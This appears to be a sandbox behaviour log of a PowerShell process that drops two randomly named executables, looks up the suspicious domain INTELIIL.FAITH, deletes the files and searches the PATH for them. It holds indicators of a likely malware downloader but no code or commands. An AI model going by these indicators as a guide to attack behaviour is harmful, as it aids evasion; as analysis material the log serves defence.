00:04:453 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.INI
miscellaneous
Registry
00:04:515 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3e571dbb\41bddfc6
Opened
Registry
00:04:515 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation.resources_en-US_31bf3856ad364e35
Opened
Registry
00:04:532 HKCU\Environment
Opened
00:04:532 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
Registry HKLM\System\CurrentControlSet\Control\Session Manager\Environment

00:04:532
Read PSMODULEPATH
00:04:532 Files Read C:\Users\Administrator\Documents
Registry
00:04:532 HKLM\System\CurrentControlSet\Control\Session Manager\Environment
Opened
Registry HKCU\Environment
00:04:532
Read PSMODULEPATH
Registry HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
00:04:532
Read path
Registry
00:04:532 HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
Opened
00:04:532 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
Files Read
00:04:546
Opened 8100000
00:04:546 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml
Files Read
00:04:578
Opened 8100000
00:04:578 Others Recorded system information
00:04:750 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml
00:04:750 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml

00:04:750 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
00:04:750 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml
00:04:750 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
00:04:750 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
00:04:750 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml
00:04:750 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
00:04:750 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
Files Read
00:04:765
Opened 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml
Files Read
00:04:782
Opened 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml
Files Read
00:04:782
Opened 8100000
00:04:796 Files Read C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.dll
00:04:796 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
00:04:796 Files Read C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.dll
00:04:796 Files Read C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll
00:04:796 Files Read C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll
00:04:796 Files Read C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
00:04:796 Files Read C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll
00:04:796 Files Read C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
Files Read
00:04:813
Opened 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
Files Read
00:04:828
Opened 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml
Files Read
00:04:843 Opened 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
Files Read
00:04:938
Opened 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
Files Read
00:04:968
Opened 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml
Files Read
00:05:015
Opened 8100000
Registry
00:05:093 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\a94d4ab\5a294d6
Opened
Registry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
00:05:093
Read StackVersion
Registry
00:05:093 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management.resources_en-US_31bf3856ad364e35
Opened
Registry
00:05:093 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
Opened
Registry
00:05:110 HKCU\Control Panel\International
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application
Opened
00:05:110 Registry HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Media Center
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
Opened
00:05:110 Others Retrieved the user's logon name
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\OSession
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell
Opened
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\ODiag
Opened
Registry HKCU\Control Panel\International

00:05:110
Read sYearMonth
Registry
00:05:110 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell
Opened
00:05:157 Files Read C:\Users\Administrator
File
00:05:157 Operations, Obtained a bitmask representing the currently available disk drives
miscellaneous
File
miscellaneous
00:05:171 Files Read C:\
File
00:05:171 Operations, Obtained information about the file system and volume associated with the root directory
miscellaneous
00:05:171 Files Read C:\.
File
miscellaneous
Registry
00:05:188 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security.resources_en-US_31bf3856ad364e35
Opened
Registry
00:05:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\20fe3c1a\56aa3966
Opened
00:05:218 Files Read C:\Users\.
00:05:218 Files Read C:\Users
00:05:235 Files Read C:\Users\Administrator\.
00:05:235 Files Read C:\Users\Administrator\Documents\.
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:05:328
Registry
00:05:328 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
Opened
Registry
00:05:328 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualC__b03f5f7f11d50a3a
Opened
00:05:328
Read ConfigMask
00:05:328
Read ConfigString
00:05:328
Read DisplayName
00:05:328
Read EvalationData
00:05:328
Read ILDependencies
00:05:328
Read MVID
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
00:05:328
Read Status
Registry
00:05:328 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
Opened
00:05:328
Read NIDependencies
00:05:328
Read DisplayName
00:05:328
Read Microsoft.VisualC,8.0.0.0,,b03f5f7f11d50a3a,MSIL
00:05:328
Read Status
00:05:328
Read LastModTime
00:05:328
Read Modules
00:05:328
Read SIG
Registry
00:05:328 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09
Opened
C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
Files Read
00:05:343
Opened Normal
File
00:05:343 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.INI
miscellaneous
Registry
00:05:468 HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds
Opened
Registry HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds
00:05:468
Read PipelineMaxStackSizeMB
File
00:05:610 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI
miscellaneous
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:05:610
Read ConfigMask
00:05:610
Read Status
00:05:610
Read NIDependencies
00:05:610
00:05:610
Read MVID
00:05:610
Read ILDependencies
00:05:610
Read EvalationData
00:05:610
Read DisplayName
00:05:610
Read ConfigString
Registry
00:05:610 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8
Opened
Registry
00:05:610 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
Opened
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config
Files Read
00:05:625
Opened 100000
00:05:625 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\
00:05:625 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config
00:05:625 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
00:05:640 Files Read SOQCkMM9Cu.exe
Registry
00:05:640 HKLM\Software\Microsoft\Windows NT\CurrentVersion
Opened
C:\Users\Administrator\Documents\SOQCkMM9Cu.exe
Files Write
00:05:640
Created 100000
00:05:640 Files Read 2YV4eZJZRWG.exe
C:\Users\Administrator\Documents\2YV4eZJZRWG.exe
Files Write
00:05:640 Created 100000
Registry HKLM\Software\Microsoft\Windows NT\CurrentVersion

00:05:640
Read InstallationType
Socket
00:05:671 Initiated WS2_32 socket DLL
Activities
Registry HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance

00:05:688
Read First Counter

00:05:688
Read Library
Registry
00:05:688 HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
Opened
Registry
00:05:688 HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
Opened

00:05:688
Read IsMultiInstance
Registry HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance

00:05:688
Read CategoryOptions

00:05:688
Read Counter Names
Socket
00:05:688 Closed the socket
Activities

00:05:688
Read FileMappingSize
Signal
00:05:703 global\.net clr networking
Objects
00:05:703 Others Converted a string-format security descriptor into a valid, functional security descriptor
Process powershell.exe
00:05:703
Opened QueryInformation
Socket
00:05:718 Controlled the I/O mode of the newly created socket
Activities
Registry
00:05:750 Retrieved a handle to the HKEY_CURRENT_USER key for the user the current thread is impersonating
Opened
Registry
00:05:750 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Opened
Registry
00:05:750 HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
Opened
Socket
00:19:452 Terminated use of the Winsock DLL
Activities
DNS
00:19:452 Obtained network parameters for the local computer
Queries
DNS
00:19:452 Translated a host name WPAD into an IP address
Queries
Socket
00:19:468 8.8.8.9
Activities
DNS
00:23:781 Translated a host name INTELIIL.FAITH into an IP address
Queries
Files
00:23:797 C:\Users\Administrator\Documents\SOQCkMM9Cu.exe
Deleted
Files
00:23:797 C:\Users\Administrator\Documents\2YV4eZJZRWG.exe
Deleted
Registry
00:23:812 HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
Opened
Registry HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server
00:23:812
Read Default
Registry HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
00:23:812
Read Default
Registry
00:23:812 HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server
Opened
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.BAT
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.psm1
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.CMD
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.COM
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.EXE
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.JS
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.JSE
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.VBE
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.VBS
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.WSF
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.ps1
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.psd1
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.psm1
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.JSE
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.ps1
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.BAT
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.CMD
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.VBS
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.VBE
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.COM
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.EXE
miscellaneous
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.JS
miscellaneous
00:24:047 Files Read C:\ProgramData\Oracle\Java\javapath
File
00:24:047 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.psd1
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.VBE
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.psm1
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.psd1
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.ps1
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.VBS
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.JS
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.WSH
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.EXE
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.COM
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.CMD
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.BAT
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.MSC
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.WSF
miscellaneous
File
00:24:062 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.WSH
miscellaneous
00:24:077 Files Read C:\Windows\system32
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.psm1
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.psd1
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.ps1
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.WSH
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.JSE
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.MSC
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.WSF
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.MSC
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.COM
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.BAT
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.COM
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.EXE
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.ps1
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.psd1
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.psm1
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe
miscellaneous
File
00:24:077 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.EXE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.CMD
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.JS
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.VBE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.JS
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.EXE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.COM
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.psm1
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.BAT
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.psd1
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.CMD
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.BAT
miscellaneous
00:24:093 Files Read C:\Windows\System32\Wbem
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.VBS
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.ps1
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.psd1
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.psm1
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.VBE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.COM
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.WSH
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.WSF
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.VBS
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.VBE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.MSC
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.JSE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.JS
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.EXE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.ps1
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.CMD
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.BAT
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.JSE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.MSC
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.VBE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.VBS
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.WSF
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.WSH
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.psd1
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.psm1
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.BAT
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.CMD
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.COM
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.EXE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.JS
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.JSE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.MSC
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.VBE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.VBS
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.WSF
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.WSH
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.ps1
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.EXE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.WSF
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.VBS
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.VBE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.MSC
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.JSE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.JS
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.CMD
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.BAT
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.CMD
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.COM
miscellaneous
00:24:093 Files Read C:\Windows
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.JS
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.JSE
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.MSC
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.VBS
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.WSF
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.WSH
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.ps1
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.psd1
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.psm1
